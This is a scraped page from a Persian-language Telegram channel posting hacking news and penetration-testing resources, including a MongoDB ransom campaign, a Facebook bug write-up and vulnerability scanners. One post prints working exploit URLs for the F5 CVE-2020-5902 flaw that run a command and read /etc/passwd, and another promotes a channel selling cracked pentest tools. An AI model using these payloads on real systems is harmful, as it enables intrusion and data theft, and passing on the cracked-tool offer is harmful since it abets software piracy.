امنیت اطلاعات
847 subscribers
2.38K photos
153 videos
156 files
2.58K links
آخرین اخبار هک، ابزارها و روش های تست نفوذ را در این کانال دنبال کنید

بخش انگلیسی :
https://t.iss.one/sec_nerd_en


برای عضویت در گروه پیام بدید:
@rect00
Download Telegram
در یک کمپین باج گیری بیش از ۲۳ هزار دیتابیس مونگو که بصورت غیرامن در فضای اینترنت قرار گرفته بودند توسط هکرها دزدیده شده و متن باج خواهی بجای دیتای اصلی قرار گرفت.
میزان باج درخواستی معادل 0.015 بیت کوین است و اگر تا دو روز توسط مالک دیتابیس پرداخت نشود، دیتای تصاحب شده توسط هکرها منتشر خواهد شد.



https://www.darkreading.com/cloud/22900-mongodb-databases-affected-in-ransomware-attack/d/d-id/1338271


#mongodb
#news
#nosql


@sec_nerd
معاون وزیر ارتباطات هستن


#mci
#irancell


@sec_nerd
This media is not supported in your browser
VIEW IN TELEGRAM
آسیب پذیری جدید کشف شده در تجهیزات F5
شناسه : CVE-2020-5902

قابلیت ها: اجرای دستور، حذف یا ایجاد فایلهای دلخواه، از کار انداختن سرویسها و اجرای کدهای جاوا


اسکریپت کشف آسیب پذیری برای nmap:
https://raw.githubusercontent.com/RootUp/PersonalStuff/master/http-vuln-cve2020-5902.nse

پیلود سانسور شده در ویدیو:
https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin


#f5
#rce


@sec_nerd
پیلودهای سانسور شده در تصویر:

https://x.x.x.x/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
https://x.x.x.x/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd


#f5
#rce


@sec_nerd
This media is not supported in your browser
VIEW IN TELEGRAM
سلام

تعدادی از دوستان کانال/گروه شروع به قفل شکنی بعضی از ابزارهای گرون قیمت تست نفوذ کردن و ما هم بعد از اطمینان از صحت کارشون، تصمیم گرفتیم ازشون حمایت کنیم

این لینک کانالشون هست که میتونید محصولات و قیمت هارو ببینید

@secstore



@sec_nerd
اسکنر smbghost و smbleed

CVE-2020-0796
CVE-2020-1206

https://github.com/ZecOps/SMBGhost-SMBleed-scanner


#windows
#rce


@sec_nerd
هک بار جدید بدون نیاز به لایسنس(نسخه پولی این افزونه فایرفاکس هم وجود داره)

https://addons.mozilla.org/en-US/firefox/addon/hackbar-free/



#firefox #hackbar


@sec_nerd
رایت آپ کشف آسیب پذیری بر روی فیسبوک
این آسیب پذیری به هکرها اجازه میداد هر عکس دلخواهی را حذف کنند


https://bugreader.com/social/write-ups-general-how-we-were-able-to-delete-donald-trump-posts-on-facebook--100955


#facebook
#bugbounty
#pentest
#writeup

@sec_nerd